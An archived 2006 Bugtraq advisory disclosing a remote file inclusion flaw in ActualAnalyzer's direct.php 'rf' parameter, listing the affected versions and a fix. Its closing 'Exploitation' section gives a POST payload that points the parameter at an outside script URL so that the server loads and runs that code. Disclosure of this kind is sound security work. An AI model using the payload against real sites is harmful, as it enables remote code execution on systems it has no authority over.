lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 19 Apr 2006 08:57:15 -0000
From: admin@...orsecurity.de
To: bugtraq@...urityfocus.com
Subject: [MajorSecurity]ActualAnalyzer - Remote File Include Vulnerability


[MajorSecurity]ActualAnalyzer - Remote File Include Vulnerability 
-----------------------------------------------------------
Software: ActualAnalyzer
Type: Remote File Include Vulnerability
Date: April, 19th 2006
Vendor: ActualScripts
Page: http://actualscripts.com
Risc: High


Credits:
----------------------------
Discovered by: 'Aesthetico'
http://www.majorsecurity.de


Affected Products:
----------------------------
ActualAnalyzer Lite 2.72   and prior
ActualAnalyzer Gold 7.63   and prior
ActualAnalyzer Server 8.23 and prior

Description:
----------------------------
ActualAnalyzer is a powerful statistics-gathering and analysis tool for monitoring web site traffic. 
It is equally effective for sites with low and high volumes of traffic 
and provides a wealth of comparative and analytical information.
High performance is achieved by using a MySQL database. 


Requirements:
----------------------------
register_globals = On


Vulnerability:
----------------------------
Input passed to the "rf" parameter in "direct.php" is not
properly verified, before it is used to include files. This can be
exploited to include arbitrary files from external resources.


Solution:
----------------------------
Edit the source code to ensure that input is properly sanitised.

Set "register_globals" to "Off".


Exploitation:
----------------------------
Post data:
rf=http://www.yourspace.com/yourscript.php?


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ